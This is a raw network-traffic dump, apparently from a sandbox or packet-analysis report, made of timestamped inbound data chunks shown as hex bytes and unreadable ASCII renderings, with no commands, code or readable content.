                                                                                                                                                    2022-09-29 12:59:14 UTC21319INData Raw: 66 3c 49 e8 c7 b8 ce 37 f3 ca d2 df 65 86 34 9c 8c fc ba 29 7d eb 01 e5 64 6d 17 df 73 82 8d 17 42 e5 d8 60 0c 64 6c a1 39 4b 03 c8 78 89 84 0d 51 3f 6f ff f2 ea 4b b3 4d 11 f3 f7 1e 9f 06 72 0c fa 9f 60 60 0b db a3 bd 54 c4 42 a2 df b5 9f 2b b0 61 e5 16 6e 67 fa 40 60 6d e1 14 b3 28 22 0a 65 83 87 b8 13 4d 92 92 06 7a 4f 2e 18 25 a4 27 ca 9d b5 84 6c a5 2f 03 8a 71 e6 83 94 30 75 96 a5 68 29 b4 ea 5d dd 4a 05 37 8d 33 89 4e b3 2a 04 56 60 6a 28 9e 3b 6a 60 86 bd d7 9f f3 c8 9a 15 8f 15 61 00 a7 ae 33 c0 da 59 7b 38 bf d6 3d a7 62 b5 17 54 09 f8 d8 ad 57 07 ef fe b7 3e cd c3 af f5 04 bb d5 80 9b 33 f5 69 9e ee 4a dd 3d 65 64 2b 07 f9 98 6a 34 db 8b 44 e7 dc d9 0e 70 d6 fa 8c 80 f6 c3 80 cd 44 aa ed 35 73 99 e5 6d f3 ca e1 4a f8 91 41 54 c6 a2 fc 3a e9 ac
                                                                                                                                                    Data Ascii: f<I7e4)}dmsB`dl9KxQ?oKMr``TB+ang@`m("eMzO.%'l/q0uh)]J73N*V`j(;j`a3Y{8=bTW>3iJ=ed+j4DpD5smJAT:
                                                                                                                                                    2022-09-29 12:59:14 UTC21335INData Raw: 38 42 ae 47 70 5d 05 45 24 5a 42 96 fc 0b aa 7b 02 93 31 2a f2 24 90 74 20 0a 28 88 f7 84 94 ce 15 dd 8b 8a 00 a0 b6 db fe c7 ea 03 fb 9c 2e 88 9a 46 02 f7 fc 11 e8 33 aa 32 85 24 eb 19 53 49 42 30 19 a0 41 e4 9d c6 78 a4 67 e7 46 47 5a 19 54 e0 b5 2a fd 24 21 03 b0 f0 fe 3d 27 5d cd 5c c0 ca 95 6c 46 8b 8a b7 b8 5f 78 50 bb ad e7 14 31 09 3c 3d fa 6e bc 23 7f d4 c7 fa b8 4d 69 3d 4a 03 29 8a 1d 50 7c cf 61 6b e0 31 f3 ad 52 ea 80 39 63 c3 e2 ab 4d 15 28 60 42 48 b7 01 eb 3e 43 0b c1 4e a6 90 01 05 42 a0 38 a2 b8 a5 13 d7 e1 5a aa 3f e1 e0 df d5 8f 3e 3a ca 76 40 cc b9 b3 c3 7f 23 a3 c9 6a 73 48 e8 72 d7 92 ac 88 50 00 77 c8 20 ed db 0b cc 93 e3 53 3c 14 1e 5c 3a 7e 29 92 82 99 4e 84 ce 66 97 8e 0a 90 f7 cf 5d 46 45 de e6 b5 6a 51 47 99 bc c9 c7 2f b5 6a
                                                                                                                                                    Data Ascii: 8BGp]E$ZB{1*$t (.F32$SIB0AxgFGZT*$!=']\lF_xP1<=n#Mi=J)P|ak1R9cM(`BH>CNB8Z?>:v@#jsHrPw S<\:~)Nf]FEjQG/j
                                                                                                                                                    2022-09-29 12:59:14 UTC21351INData Raw: a4 90 e6 2d 70 74 ec d8 49 24 9e ee 1f 74 2d 25 27 69 45 6a 93 1a d2 10 52 a9 fa d2 19 3d 26 f7 3a cd d4 ba 62 cd 69 60 cb 23 38 a3 2f 4e 16 88 51 0b ee 89 15 fe 4c e6 7b 9b 45 ca 6a 49 4e 94 42 bc 98 45 30 e4 46 00 3f fa 42 24 37 86 c9 10 37 52 13 c5 10 17 fb 1f 01 3d 2a 17 b6 2a 1f 81 a4 66 12 03 86 9e 40 c8 81 fa ad 0b 9b 93 90 03 4c 13 6e af 28 4a 65 eb 14 9d 3e 4a 0a 28 47 02 cf 3a ea 6b 49 c0 78 fb 7f 2b 79 32 fe 2b b0 30 89 63 b8 c7 8b c6 21 5f 3d 58 a0 66 22 4e a9 6e e0 55 42 54 93 9d 72 58 dc 98 ff d6 1e b8 ab 51 f8 5e d4 f1 42 ef df d6 88 c3 cf 92 79 e9 2f 64 a2 ea c9 03 a1 34 57 f9 9a a9 ba 9b 7c 0f fb 52 88 ca d0 2a 60 38 8f 13 0f f4 a3 51 f2 9d 0f 75 e6 b2 e7 6f ea e8 69 94 f1 f9 2d 43 dc b2 21 d1 42 f0 01 a5 83 fc 2b 4c 61 c2 4e 02 18 84 ff
                                                                                                                                                    Data Ascii: -ptI$t-%'iEjR=&:bi`#8/NQL{EjINBE0F?B$77R=**f@Ln(Je>J(G:kIx+y2+0c!_=Xf"NnUBTrXQ^By/d4W|R*`8Quoi-C!B+LaN
                                                                                                                                                    2022-09-29 12:59:14 UTC21367INData Raw: 56 b3 3f c2 0a c4 58 11 e7 fb 8a ba 2f 6b 5f 69 26 d0 da f2 61 f8 3b 65 ac e5 22 13 b7 50 e1 7c a9 f1 85 d5 86 76 89 b2 fd c7 a3 57 34 f6 f9 f1 bf 31 f0 74 16 b4 70 70 8e d2 d7 90 8b d2 ca 52 b3 70 3e 6f a7 52 6d f8 27 a5 a6 6f b7 d7 1d 74 e2 f0 6e 5f d6 a4 cd f9 02 60 7d 79 13 4d 7c 71 bf 4e 5f a0 b7 e4 32 d9 16 1b 62 34 f8 ae cc de 1c 9c 18 ec 70 c5 80 fb 1b d5 6e 06 0a ec cb 14 f3 1b 62 0c cf a8 c8 71 93 2a 6b 9d eb fd 72 7c ec e4 18 f5 cf 36 2f 81 4e c8 23 f4 77 9d 2e 9e d6 58 89 33 07 71 5b cc 9c a8 8b 9a b7 45 c0 c8 be 70 24 2b f8 45 d9 e0 60 66 e1 2a 6d f1 da 9b 60 95 98 c6 ee 7a 97 e9 29 d0 27 c7 6a f4 85 13 ee 9b 43 4c ac 52 8a 67 17 43 cb 2f 47 07 d8 f8 d9 99 7c ca a8 5c 36 f7 be f3 78 66 63 45 00 73 5b ec 7e be 4d 38 94 7e d5 ad 76 90 23 3f cf
                                                                                                                                                    Data Ascii: V?X/k_i&a;e"P|vW41tppRp>oRm'otn_`}yM|qN_2b4pnbq*kr|6/N#w.X3q[Ep$+E`f*m`z)'jCLRgC/G|\6xfcEs[~M8~v#?
                                                                                                                                                    2022-09-29 12:59:14 UTC21383INData Raw: 23 05 01 35 87 2d fd cf 51 81 24 cc 94 5b 93 2a 0a e0 ea 25 c7 94 54 0c 66 8b ee d8 42 77 57 46 32 8c a0 6b a0 24 de 49 8a ba 33 61 ef 4c df 41 85 1e 58 8a 5c 32 aa e0 93 60 b1 18 82 d1 c2 5f 8f e9 9c 1f 65 d1 1e 1e 7b fd 93 95 ce d6 f4 9a 67 d0 45 de a0 30 d6 0c 22 aa e7 9b cf 78 95 4b 2c 46 77 55 80 08 07 07 5f 2f 8f 4b 41 45 f5 5e 27 11 cf f6 b3 d3 e4 8d 1a 40 50 71 4f 0f 2a e4 4b 1c c6 fd e2 be c0 08 ee 59 41 7a 57 b4 ac cd 02 af 9d f7 22 ac e9 4d 59 1d b1 6b cd c2 62 1e 2e 54 bd 2b 19 10 be 52 8a 6a 3b 8b 3f dc 11 55 de 1d 1d 36 d2 05 9d ad 01 2e f1 f6 bc db b3 68 bb 41 b4 15 84 30 c4 37 1e 22 4f 9a 86 77 ba 12 5e bc 7f 77 af bc 80 00 82 94 3c 4a ab a1 31 cf 92 6c 59 8f 90 92 7d f2 8b 55 b4 05 75 cd 56 7a f1 ca 74 a4 96 27 25 ed 81 3e e4 22 90 dd f9
                                                                                                                                                    Data Ascii: #5-Q$[*%TfBwWF2k$I3aLAX\2`_e{gE0"xK,FwU_/KAE^'@PqO*KYAzW"MYkb.T+Rj;?U6.hA07"Ow^w<J1lY}UuVzt'%>"
                                                                                                                                                    2022-09-29 12:59:14 UTC21399INData Raw: d7 79 78 39 45 e0 a4 aa 15 d6 44 6a 56 6e 02 e7 5f de 4a 48 c4 08 7a 9c 40 ec 6b f4 76 5b 11 6e ad 1a 34 7e 44 a3 fa 72 c9 a4 aa a4 68 30 64 06 49 99 47 4d fa fd e8 45 86 84 b1 cd 71 d9 16 b7 2d c4 6f 66 e1 ff 45 61 f9 5c 1c 72 20 46 3b 92 08 90 48 c9 eb 9e 01 eb 71 09 09 4f 05 1c d9 73 84 85 3a 2c 4e 48 d1 0a 22 63 5d 1a 2a 9b a8 e5 44 80 65 03 37 1c 68 2c fa 54 ee 8f 77 01 6f ea 7e fb 22 aa 14 c8 98 d4 a1 4e 27 e3 81 bc fa bc 94 db 4f ff 08 1f 68 01 a9 73 b1 56 87 44 79 06 fb 8a 46 99 e5 59 25 f8 6f 57 5c 85 4d b7 bc 58 c0 6e b3 68 60 0a 21 0c bf f9 e3 fb 5e eb 1b 12 0f 12 fb e5 8f e7 bd 3d 77 6c e5 be ac 27 d2 e4 73 60 c1 b8 e6 36 df 78 73 6c 6d 07 07 19 a3 06 25 b1 9e 68 41 fe e5 ea 8f 96 d6 33 7c 63 a6 78 22 61 f1 84 83 18 28 e0 cd a0 45 18 9b 19 65
                                                                                                                                                    Data Ascii: yx9EDjVn_JHz@kv[n4~Drh0dIGMEq-ofEa\r F;HqOs:,NH"c]*De7h,Two~"N'OhsVDyFY%oW\MXnh`!^=wl's`6xslm%hA3|cx"a(Ee
                                                                                                                                                    2022-09-29 12:59:14 UTC21415INData Raw: d3 4d a1 ac 1a 1d 75 fb e2 7d c3 74 b7 16 44 d3 e9 98 4a e5 b0 62 2b 6a 00 36 b6 81 b2 20 80 63 f4 50 c6 1b 12 d4 83 f7 24 be 58 02 e6 b4 81 eb a3 9e 43 15 e3 fa e3 1d 47 1d 91 db 9e af 09 20 54 7e 22 5d b0 db c0 f3 27 b9 63 c0 5f 2a 15 8c a3 a1 a1 f7 09 75 a6 8f 54 28 30 b2 31 92 d3 05 6d 27 6d 9b 14 27 5e 9b ba 68 ff b7 7f 68 3f 5f 91 55 62 1f 1b 97 9f 3f c4 ec 3c bd e2 04 d9 09 f7 7b 78 e5 59 57 1c f8 85 aa ed 72 b1 43 f8 dd 15 90 34 55 ec 96 d6 5d ec 94 bf f7 e9 ec a1 df dc 61 9f c6 b9 3e 28 eb 10 33 39 48 09 69 81 c1 92 6e 00 1c c7 6b 6b 18 57 37 9f f3 21 b2 16 aa d5 a9 f1 f9 c7 24 24 06 07 cd 00 8a b1 28 a8 8e aa e4 6b 60 c3 ad 51 af aa 5f 88 1f 1f 19 65 f6 92 c2 e0 86 c9 01 21 cc 02 d0 ea 67 18 4f 76 1d 16 39 ac 72 ed f7 0e 81 bb 06 69 6b 30 9c 69
                                                                                                                                                    Data Ascii: Mu}tDJb+j6 cP$XCG T~"]'c_*uT(01m'm'^hh?_Ub?<{xYWrC4U]a>(39HinkkW7!$$(k`Q_e!gOv9rik0i
                                                                                                                                                    2022-09-29 12:59:14 UTC21431INData Raw: 00 32 66 0f 36 52 6b eb 97 37 f6 79 8f 37 75 3a 6c f8 9d 12 df 2c 52 1f db 57 4f 12 8e d4 5b 9b 68 f4 d0 0d 23 6c 95 28 85 f0 97 04 08 d2 7d 37 cb 9a 9d 9c 81 66 08 08 f6 de 35 b1 7c 5b fb d6 3b 75 de fc 31 8c e8 3f d1 da 63 3e 2e 0e 32 0c fd cf c2 8a ca ed 53 c3 dc 54 a0 17 f5 6f 2b 5d 79 a7 1d e9 8f b8 00 16 ba c7 9f 33 c7 75 06 92 3a 3c 88 23 a5 ec 5e 8a 59 41 0a bb a1 57 01 b3 af 63 fa 0b 43 65 cf 9b e8 c5 ae b8 38 0e 7a b0 54 b7 ad 24 8d 53 e6 dc ee 5e 7d 37 f2 f0 a8 f4 f2 18 a5 87 01 66 1d d3 03 95 72 83 fe 66 ff e4 26 7f 25 c1 ba a5 c2 f9 ab e7 f4 26 9a be a6 50 c0 6b cc 0a 50 2a 14 23 7e 05 86 18 29 3c db f1 5a 39 10 35 e6 c3 9a 74 3a bf 8d bc 30 43 9d 41 05 0b cc ae 9d bc 0f 98 72 99 ca 9b 09 7f 2d e5 4a bb ff 0e f3 a5 84 9a 40 ee e9 9b 0e b7 91
                                                                                                                                                    Data Ascii: 2f6Rk7y7u:l,RWO[h#l(}7f5|[;u1?c>.2STo+]y3u:<#^YAWcCe8zT$S^}7frf&%&PkP*#~)<Z95t:0CAr-J@
                                                                                                                                                    2022-09-29 12:59:14 UTC21447INData Raw: a7 3a 97 6f a8 e4 f0 43 46 97 64 99 f6 9e 93 c8 94 bf 59 59 00 d2 6e b0 58 ed af 28 49 43 30 52 ab d2 46 a6 3c 19 4a 6b 47 ab f2 77 52 aa 1b 8f 6d dd 4a c2 47 24 19 4f da bb 32 13 14 70 40 f3 8a d4 39 51 ac 64 32 d8 2b 3f 7c 7e b6 09 ce be b6 38 a8 7f 94 44 84 22 92 79 ee 67 12 fe a3 8e 24 c4 48 15 b1 fe 64 a6 22 a8 38 d7 fc e2 ac 82 73 e6 41 94 3e 1a f4 d1 21 29 9c ae 72 dc 02 22 37 2c 2d c3 ab 09 5d 37 9c 69 e1 28 02 c2 99 00 35 5c f3 b4 57 60 43 ee 41 09 fc 81 5f fd 43 bd 64 21 e5 4d 27 2c e5 91 9f 45 18 3f 19 40 0d 83 e5 87 47 88 88 7d 9e 4e 4e 2f f0 ef 05 94 bb 90 e8 4b 56 20 d4 41 ec 3f 77 0f 56 6e 6c 61 f2 1c 4c 5a 1b 9a bc 04 d5 24 fe 48 29 71 b9 9d 15 da 19 bd 2b 44 12 0c 3f 45 d8 4c b6 73 a2 64 8b 5a 92 52 af 23 d2 00 3a 00 6d d2 d0 37 21 08 7a
                                                                                                                                                    Data Ascii: :oCFdYYnX(IC0RF<JkGwRmJG$O2p@9Qd2+?|~8D"yg$Hd"8sA>!)r"7,-]7i(5\W`CA_Cd!M',E?@G}NN/KV A?wVnlaLZ$H)q+D?ELsdZR#:m7!z
                                                                                                                                                    2022-09-29 12:59:14 UTC21463INData Raw: 86 38 d9 70 a9 4f 10 7a 1b b5 40 58 66 ae 98 60 9e 2d 8b b1 96 00 06 5c 55 07 f0 4c e5 35 c7 ba 12 2c 6d af 90 e8 94 99 12 50 b1 70 f0 da 2e e2 3e a4 f2 e4 7d cb 06 f6 b8 a7 23 41 bc 12 fe 98 89 3a ee ba 4f 1c c6 50 9d 63 55 0e 7a 82 c1 f4 84 ad e5 06 6a ed 71 af a2 db 8a 46 c1 fd 0a 4d 5f e1 da bd 19 c6 40 cc 81 ea b5 32 f6 69 22 85 ac 52 48 95 16 37 18 32 fa 22 c2 31 a9 6c f3 f5 d8 bc ec a6 eb 01 e1 8c a6 17 19 75 be 0a 8a f7 df c5 b7 27 a7 28 47 99 63 98 d3 26 44 56 ab 0c d0 2b 5e 61 94 5d 81 f4 03 5c b7 bd 6b 4b eb 15 fe 11 d9 06 d6 08 26 f9 77 f4 f8 3e de c2 98 b3 32 48 69 c9 c0 5f af 14 7c 3e 49 cf 2c 5b ad c1 18 29 e1 29 3a ce 96 71 69 a9 c2 8c 88 42 d5 e8 7b c4 20 9f e0 7d a2 0d 24 6b 89 fc 95 3b 63 96 c2 c3 d2 5f c7 93 71 78 0c 2e b9 de a8 6e 27
                                                                                                                                                    Data Ascii: 8pOz@Xf`-\UL5,mPp.>}#A:OPcUzjqFM_@2i"RH72"1lu'(Gc&DV+^a]\kK&w>2Hi_|>I,[)):qiB{ }$k;c_qx.n'
                                                                                                                                                    2022-09-29 12:59:14 UTC21479INData Raw: 4f b4 69 20 15 66 fb 42 5d b0 da 23 c3 bf 02 be 2c 7e 9a 0b 97 a6 d2 bc 81 55 e5 e8 55 eb 2b 5a 83 4b d8 47 73 c9 b2 90 80 0b fa ea e6 7f 61 36 de 98 b8 9d 7f da b2 da 37 59 73 36 73 8d 2a 2f 95 c2 db f2 c6 ae 12 1c 86 8c cf dd 35 1e a0 e3 25 18 5a 3d f1 0f c5 90 57 d1 08 7d 13 23 2f ab eb 1a 1a 62 0b 59 66 81 9a 88 07 82 1d 5f f7 93 f8 36 ea 86 da c4 b4 08 f9 03 36 e8 1f 29 55 bc af 5a 70 d5 58 ee 99 61 12 84 73 54 12 83 58 65 eb 4c 45 4a f3 f6 88 ab b7 9c 05 8f 5f c2 4b f6 f7 8e 13 a8 b0 56 4c 73 75 e1 8b 21 4a 05 95 85 da 02 2f d7 7c 24 c2 92 81 a9 05 7c e2 0b 87 eb dc 9f 17 94 db 31 14 d6 7e cd e7 1c 00 57 d2 c4 1e b0 4d 5b 2d 19 60 a6 cb b7 02 92 4d 60 e1 e6 24 39 52 e4 65 10 51 c4 89 c8 3c 28 a8 fe 83 5a 05 c2 20 4b 5d 07 a1 90 66 9c 1b d5 8e 85 e7
                                                                                                                                                    Data Ascii: Oi fB]#,~UU+ZKGsa67Ys6s*/5%Z=W}#/bYf_66)UZpXasTXeLEJ_KVLsu!J/|$|1~WM[-`M`$9ReQ<(Z K]f
                                                                                                                                                    2022-09-29 12:59:14 UTC21495INData Raw: 64 06 ed 65 1c 59 7d 6c fd 0b a3 52 eb 05 9b e5 59 f0 ec cf 0b 29 6a de 69 4d f6 36 99 46 a9 e6 f9 36 a9 98 ff a3 b4 fb 06 fe 9b 8c 8b e4 e2 6b 41 77 37 84 01 08 7a 9e 5b f8 11 de 9e 99 57 8f 1e 68 e5 2e e2 ec ae c0 f6 0f e5 d4 80 f2 03 f7 45 b9 55 dc c3 87 b6 cb 89 00 f7 3f 6a 8f 93 ab fa 35 26 04 51 70 24 4f fb a0 c0 d0 82 02 14 9c e7 a6 9b 16 8f be 40 4f 90 a8 b7 2f 44 7c c4 0c 07 cf d1 13 42 87 7b 55 a5 f3 87 7b 6f 94 cb e0 1e 1b 8f c4 c1 b4 b5 f4 4c a4 ad 24 16 cf 6c 71 1c 3e 67 de d2 cc 22 59 58 26 55 db 63 bc ef 24 35 01 ad 1d 28 1c 26 57 ea d3 9b 95 1a 0a 91 b5 6e d0 bb 66 82 e2 d6 57 32 ff 96 98 d2 ac cd 92 43 74 19 d7 56 d6 e9 33 62 db 8d cf 5e e4 5b 6f 7c bb 61 27 da 6a 97 e0 b8 41 15 06 c5 d4 18 93 98 90 24 9f df 81 2a f4 c4 fd 9d 09 2f 62 d5
                                                                                                                                                    Data Ascii: deY}lRY)jiM6F6kAw7z[Wh.EU?j5&Qp$O@O/D|B{U{oL$lq>g"YX&Uc$5(&WnfW2CtV3b^[o|a'jA$*/b
                                                                                                                                                    2022-09-29 12:59:14 UTC21511INData Raw: 99 8b f9 6a 53 72 d6 de 1c c0 fc 0d 3a 1b 47 4d 92 71 fb 7d 52 a8 26 72 85 8c 81 ab 44 cb 0e fb 95 8e 8f 9d 66 2c 56 4c a7 54 2a 88 83 aa 51 a0 df f9 9d 32 37 15 c2 73 5d a0 7e 06 77 47 32 ed e3 a6 ba e9 96 e0 5d a4 3a 59 23 b4 da e6 9a a4 5a 7d 87 7b 9d a3 45 fb 9d 41 2f 70 f4 67 ec d7 06 b2 ca fa 71 23 c3 0a 92 d6 b6 41 73 3e 45 e0 c0 5e a9 04 e5 5f fc 5f cd 91 8e f8 b2 3f c2 50 39 8f 4c c5 8e a3 ee f5 30 1e 6c db 5e d1 ba 0e a4 dd a1 03 0c 71 03 93 2c 33 67 f1 76 6a 49 08 5d 3b d2 df 60 76 96 4a 88 ad 8f bb 59 66 01 87 c5 1b f4 f2 74 62 d6 59 37 84 b3 2a c6 f2 c8 8b 6b ac 16 85 2d bb 8d 0c 18 1d 0f ec 7a ae b6 03 76 42 25 97 9f d7 07 55 95 2b c2 96 b2 72 42 28 c4 76 d6 fc 3c 4d cd 44 a2 5d c4 12 70 40 a5 5b eb fa e1 9c 3b c9 c2 2b 0c 16 d5 c2 c5 c2 f5
                                                                                                                                                    Data Ascii: jSr:GMq}R&rDf,VLT*Q27s]~wG2]:Y#Z}{EA/pgq#As>E^__?P9L0l^q,3gvjI];`vJYftbY7*k-zvB%U+rB(v<MD]p@[;+
                                                                                                                                                    2022-09-29 12:59:14 UTC21527INData Raw: c3 78 cf de 65 27 08 86 fe d7 85 55 ac ee f5 de c6 bf 21 13 c5 e1 08 20 6b 3f e3 5b 9a 0e c7 95 d0 b4 cb 94 33 b6 ae 0b 74 90 c2 c2 58 af cb ff c3 fc 59 cf d9 bb c2 c1 96 58 7e e6 67 4d 73 7a 0f 3f d2 8b a6 92 ee ae df 3c 67 f0 9e b9 c1 59 2b 10 ca 32 a7 11 84 dc 7c ea 85 49 c0 8e 5d fc 56 8a cd fe ee cd 58 c3 ce b8 82 9a 37 cf e9 93 fc 3c 04 13 e6 ce 36 19 55 63 cd c6 1c 5f 7e 39 d2 f3 3b 74 b7 77 0f f6 7c f6 4b c4 64 33 84 97 4f 27 03 eb f7 44 4a ca 72 14 ff f9 81 bb 9c 70 f1 86 07 87 4f c8 c4 ad 8a 3f 95 0c cd 21 5c 5d e0 e4 31 e5 95 1c 68 76 50 76 1b 78 61 35 2a cd 80 ae 40 5e 77 93 18 3a db 4f 5e b5 dd 60 1e 18 99 1c 18 f9 5c a2 15 ef f8 41 75 2f 37 93 c3 64 3a f2 b5 d6 9e 93 8c 4c 7f fb 61 6e eb d2 4b 81 a6 36 9c 0c 1a 8e 76 74 9d fd e7 18 4c e2 63
                                                                                                                                                    Data Ascii: xe'U! k?[3tXYX~gMsz?<gY+2|I]VX7<6Uc_~9;tw|Kd3O'DJrpO?!\]1hvPvxa5*@^w:O^`\Au/7d:LanK6vtLc
                                                                                                                                                    2022-09-29 12:59:14 UTC21543INData Raw: b5 f7 74 fa 92 15 2f 3d e1 98 09 6d 88 04 35 59 42 be aa 09 61 3d 94 6e 7a 0d f7 b9 e7 44 f8 07 f3 88 57 7d 96 5e 63 44 b2 4d 37 95 ce 4f 3f 84 7e 08 e5 ca d6 90 35 28 a5 7c ad 0d 23 37 bc 0a 39 a9 ad 1b e2 96 bd a7 80 ac 71 26 63 67 9e 81 f5 f3 4d b2 0c 4d 15 75 7d 24 f7 f4 dc ce f6 44 72 e9 8c 07 ba 52 e4 d2 99 c2 a9 2b 3f 8e 6e 52 cd fd 19 de 74 df ff 33 76 d1 38 9b 7d 40 06 7b 93 cb 58 c4 99 ed 78 f0 58 26 8a a4 d3 bb 04 05 76 f2 79 3e bd 23 62 b0 4a e0 16 bd aa cd 31 9c 3d 19 7b b8 91 ae 4b c3 38 fe 59 5b 51 5a 28 fb ba d5 5d 99 c2 64 f0 a9 3b 1b a1 ea b4 0a 92 8b 89 3b 3e e2 39 4f 84 e1 93 5a ea e1 42 94 9a d3 e4 ba 41 b3 bf 67 8f ef a7 c9 64 6c e1 52 6e ba cc a0 3e 3b c5 da 3b fd 04 81 9c 9e fa 03 1e d7 65 d6 f1 cd b2 fe d1 a3 1d 31 db f9 97 ff 89
                                                                                                                                                    Data Ascii: t/=m5YBa=nzDW}^cDM7O?~5(|#79q&cgMMu}$DrR+?nRt3v8}@{XxX&vy>#bJ1={K8Y[QZ(]d;;>9OZBAgdlRn>;;e1
                                                                                                                                                    2022-09-29 12:59:14 UTC21559INData Raw: b0 fe f2 ac a5 fd 2b 5b 05 95 7c ec f4 67 94 c5 8b b5 15 e1 41 7a ec 2b 95 5d c6 91 1b 67 80 c0 ff ec a2 04 97 69 7a 84 ea 60 11 11 4c af d3 82 2c f9 50 49 10 42 20 e4 bb 04 ef 79 1f 44 35 d1 20 40 3b e9 ee 28 4a 8f eb 9a db 30 02 28 30 65 f3 ed 44 01 4d 3a 35 07 29 9d 06 8d 0f fc 12 3c 11 4b 8b 8c 45 8a 49 7a 21 e3 2b a8 a5 d0 31 6a 28 ce a7 51 e8 c8 c2 38 32 cc cf 96 4b 39 09 c7 6a cb 92 61 d9 05 5b 0c b1 5e 57 ec af e0 e3 ea 21 d9 b3 0a 7a 1a fa c4 e5 79 a3 a8 1c 1a f0 72 a1 9f b3 3e 4f d5 8a df d3 15 63 56 2b 41 ea f8 4b 58 ff 6b 77 34 37 63 db 38 ea 92 63 d8 68 25 64 11 60 de 18 d5 66 ab fd 4c b4 31 06 4d 5c 96 33 f5 67 30 f7 d3 3e ea 76 33 94 f8 b2 42 8c 43 2a f2 22 b3 ab 30 65 07 68 09 ec bc 18 1b 5d dc fa 06 9c 51 39 a0 92 c6 1a 0d 46 cc 1f 42 e9
                                                                                                                                                    Data Ascii: +[|gAz+]giz`L,PIB yD5 @;(J0(0eDM:5)<KEIz!+1j(Q82K9ja[^W!zyr>OcV+AKXkw47c8ch%d`fL1M\3g0>v3BC*"0eh]Q9FB
                                                                                                                                                    2022-09-29 12:59:14 UTC21575INData Raw: ac 7e df 7b 50 15 28 f5 67 7e 92 c5 5c db 9b b6 47 cd e2 b3 c1 31 1c a9 b6 f3 1e ab 5a 89 30 a1 c4 45 73 75 72 cb 8a 6a 37 0f c0 37 8a 9f 9f 41 34 45 07 47 5d 94 a3 0a 18 40 6f 76 5a bc f9 54 a9 03 02 ee dc 6e 57 af f6 5b 58 c8 4f 08 45 f0 cf 64 46 8f 52 8e 9a 94 69 ed b7 4b e1 40 49 c2 a6 e9 3c 11 58 65 27 12 5c 49 61 4f 78 98 a7 bb f5 20 8a 8f ad 1d b1 91 c6 df f5 e8 bd fa c2 9a d3 6a 6d 41 e5 6e f6 54 c0 dc bd 02 8e 44 be 96 85 9c 1d d0 59 d2 f4 a9 59 fe 97 aa 9c 9e e7 72 c6 14 21 dc f5 b5 0a 99 ec 43 ee 3c 20 68 95 c3 63 aa 41 a1 9b fc af 32 05 03 f4 1c 56 c1 a1 2e fc 24 1d 5c 24 88 e6 3b 2c 96 e4 66 69 a4 06 c5 24 f7 46 fd 47 1b a7 ac f6 82 e1 09 20 1c cd ff cd 50 a4 13 b8 50 d8 78 c8 6b ec 57 a1 ee e7 62 1f 8c 32 c0 3b 94 d7 2a 4d db 7d b5 d8 94 15
                                                                                                                                                    Data Ascii: ~{P(g~\G1Z0Esurj77A4EG]@ovZTnW[XOEdFRiK@I<Xe'\IaOx jmAnTDYYr!C< hcA2V.$\$;,fi$FG PPxkWb2;*M}
                                                                                                                                                    2022-09-29 12:59:14 UTC21591INData Raw: ca 30 62 50 90 b9 72 99 66 be d8 f1 d3 cf 02 af 99 7c ab 3d 27 6b 9b a7 30 16 a4 fd 1a 9d 55 fb 0d e9 f7 7b 40 b8 03 98 26 df 6e 85 e3 65 88 34 29 f7 61 4a ca 97 b0 ea b5 00 30 7d bc 2b 39 90 e9 50 d9 f9 51 79 17 70 b8 13 ae 74 cd 5f 7a 69 54 67 bd 86 db 2e 9c bd be 42 15 7e 18 18 e7 11 09 5b 1b 4e 97 dc e5 9b 8c 31 d7 7b b4 b9 38 50 74 29 c7 8e d4 69 04 0d cc 91 df 2e 90 bb b3 94 03 da 58 43 b6 d4 f2 a8 8b 30 60 f8 82 d1 cd 6d e9 e8 67 fb 4b 69 91 11 32 fd d7 1c 2e 28 f2 c2 33 56 53 72 dc 60 41 c6 41 cc 39 11 80 0c c8 77 1c c4 26 fd 54 5d 8b ac ee 97 4b ef da f4 5e 0a 80 37 39 55 1e 56 a2 39 fb 00 27 5f 75 02 89 b6 a5 15 58 ef f0 e2 48 5b 5b f8 08 4b e1 a3 21 67 dc cc a5 07 e1 11 75 95 b0 33 a7 d3 a1 a0 74 70 e0 e4 01 ad 51 58 e4 54 7d e9 50 0b 57 f1 43
                                                                                                                                                    Data Ascii: 0bPrf|='k0U{@&ne4)aJ0}+9PQypt_ziTg.B~[N1{8Pt)i.XC0`mgKi2.(3VSr`AA9w&T]K^79UV9'_uXH[[K!gu3tpQXT}PWC
                                                                                                                                                    2022-09-29 12:59:14 UTC21607INData Raw: 76 65 bf 78 7e 79 f6 b7 1c 6d e0 63 ea 1d b8 07 4b 40 e0 c3 cf 34 40 60 5e 9e 23 95 dd 31 d3 20 84 86 19 55 b4 63 4d 60 85 aa 40 b4 e3 41 59 f9 7c 04 c1 e9 c7 84 68 d3 a0 5e bf 37 02 ef c4 f1 73 a7 39 70 d9 1a 8d fa 78 ad b0 1c 26 65 62 7d cd c2 97 7e 1b 30 fe 22 ae c7 10 15 10 bb e4 c7 fd c8 ae f2 56 81 c8 16 03 c7 44 85 5d ee 95 d8 d2 9e d7 b1 cc dc f6 16 82 ad 67 5f ba ac 9f 1a 47 8e 21 f1 dc f3 bb 93 f3 ab 55 26 11 df fa 48 e8 b1 01 87 14 4b fc e0 e1 87 9d 2b 46 df e9 14 b5 a8 59 7f d4 d5 31 ea 7a da 5f 8d 17 48 99 95 01 00 b6 ed a9 1b 32 26 80 64 34 0f b2 33 f1 48 70 e8 f3 8d 69 4f 90 ad f8 81 f8 9a 8d ba 2b 9b 52 c0 42 94 74 b8 8c e7 4a c4 63 7c 39 7f e3 82 87 e0 21 38 e5 e0 ee 15 af a5 ce 0a 5c 84 83 91 28 c8 f7 b7 b5 66 cd 69 6a 4f 4d c9 4f 5b 03
                                                                                                                                                    Data Ascii: vex~ymcK@4@`^#1 UcM`@AY|h^7s9px&eb}~0"VD]g_G!U&HK+FY1z_H2&d43HpiO+RBtJc|9!8\(fijOMO[
